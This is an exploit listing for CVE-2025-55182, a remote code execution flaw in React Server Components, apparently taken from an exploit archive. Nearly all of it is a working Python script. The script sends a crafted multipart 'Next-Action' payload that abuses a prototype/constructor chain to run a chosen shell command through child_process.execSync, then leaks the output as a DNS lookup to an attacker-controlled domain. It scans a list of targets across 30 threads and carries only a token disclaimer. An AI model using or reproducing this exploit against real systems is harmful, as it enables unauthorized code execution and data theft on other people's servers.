Share
## https://sploitus.com/exploit?id=PACKETSTORM:218661
# Exploit Title:  React Server 19.2.0 - Remote Code Execution
    # Date: 2025-12-05
    # Exploit Author: [EynaExp] (https://github.com/EynaExp)
    # Vendor Homepage: https://react.dev
    # Software Link: https://react.dev/reference/rsc/server-components
    # Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
    # Tested on: Windows,Linux
    # CVE : CVE-2025-55182
    
    
    
    
    import requests
    import urllib3
    from concurrent.futures import ThreadPoolExecutor, as_completed
    import argparse
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Color definitions
    class Colors:
        RED = '\033[91m'
        GREEN = '\033[92m'
        YELLOW = '\033[93m'
        BLUE = '\033[94m'
        END = '\033[0m'
    
    
    print("""
                โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— 
                โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
                โ–ˆโ–ˆโ•‘      โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—   โ•šโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
                โ–ˆโ–ˆโ•‘       โ•šโ–ˆโ–ˆโ•”โ•  โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•   โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ•โ• 
                โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘ โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘     
                โ•šโ•โ•โ•โ•โ•โ•โ•  โ•šโ•โ•   โ•šโ•โ•  โ•šโ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•     
    
                        CVE-2025-55182 Proof of Concept
    				by EynaExp
                       GitHub: https://github.com/EynaExp
    """)
    print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")
    
    
    
    
    
    class NoUsageParser(argparse.ArgumentParser):
        def error(self, message):
            # completely suppress argparse usage
            print(f"Error: {message}")
            raise SystemExit(1)
    
    parser = NoUsageParser(description="EynaExp Scanner")
    
    parser.add_argument('-d', required=True)
    parser.add_argument('-l', required=True)
    parser.add_argument('-c', required=True)
    print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n")
    
    
    
    args = parser.parse_args()
    
    
    
    dns_endpoint = args.d.strip()
    targets_file_path = args.l.strip()
    CMD = args.c.strip()
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
        "Next-Action": "x",
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
    }
    request_body = (
        "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        "Content-Disposition: form-data; name=\"0\"\r\n\r\n"
        "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
        "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
        "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
        "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
        "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        "Content-Disposition: form-data; name=\"1\"\r\n\r\n"
        "\"$@0\"\r\n"
        "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
    )
    
    def send_request(target_url):
        try:
            response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
            result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
            
            for header_key in ["x-action", "next-action", "rsc"]:
                if header_key in response.headers:
                    result_message += f"\n{Colors.BLUE}    header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
    
            return result_message
    
        except Exception as exception:
            return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
    
    with open(targets_file_path) as file_handle:
        target_urls = [line.strip() for line in file_handle if line.strip()]
    
    print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets โ€” starting multi-thread scan...{Colors.END}\n")
    with ThreadPoolExecutor(max_workers=30) as executor:
        futures = {executor.submit(send_request, url): url for url in target_urls}
    
        for future in as_completed(futures):
            print(future.result())